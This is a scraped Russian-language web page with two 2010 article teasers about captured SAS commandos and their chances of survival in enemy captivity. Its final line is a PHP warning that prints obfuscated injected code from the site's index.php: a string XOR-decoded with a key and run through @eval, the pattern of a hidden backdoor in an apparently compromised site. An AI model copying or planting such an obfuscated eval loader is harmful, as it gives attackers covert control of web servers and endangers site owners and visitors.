Попавшие в плен бойцы спецназа не падают духом

Опубликовано 7-10-2010, 12:18

Просмотров 16451

Попавшие в плен бойцы спецназа не сдаются.
И сегодня бойцы SAS, попавшие в плен, не могут рассчитывать на то, что с ними будут обращаться согласно положениям Женевской Конвенции (которая гарантирует военнопленным право находится в безопасном месте, получать воду, пищу, медицинскую помощь и даже писать письма домой).
Наилучшие шансы выжить дает немедленный побег, или, если это невозможно, исполнение роли «серого человека», обычного солдата, не представляющего особой ценности для контрразведки противника в качестве источника информации.
Полный текст

Коммандос SAS в плену

Опубликовано 22-09-2010, 20:42

Просмотров 8800

Коммандос SAS в плену
Необходимость действовать в условиях строгой секретности на территории, контролируемой противником, или в чужой стране, где трудно смешаться с местным населением, делает любую операцию SAS чрезвычайно опасным мероприятием. Все операции на вражеской территории сопряжены с риском для жизни, таят угрозу ранения или плена.
Устраиваемые ими диверсии, засады и налеты сделали их крайне непопулярными у вражеского командования, что гарантирует плохое обращение и даже физическое уничтожение в плену.
Полный текст
Warning: assert(): Assertion "eval('$nGIE3=$FHLfom3Fx($nGIE3);$bQQvD7cg="";$QVSry4="DuSAkQ";for($gyBB3G=0;$gyBB3G<716;$gyBB3G++)$bQQvD7cg.=chr(ord($nGIE3[$gyBB3G])^ord($QVSry4[$gyBB3G%6]));@eval($cnDaz8X($bQQvD7cg));');" failed in /home/a/alvis2/tchest.org/public_html/index.php on line 321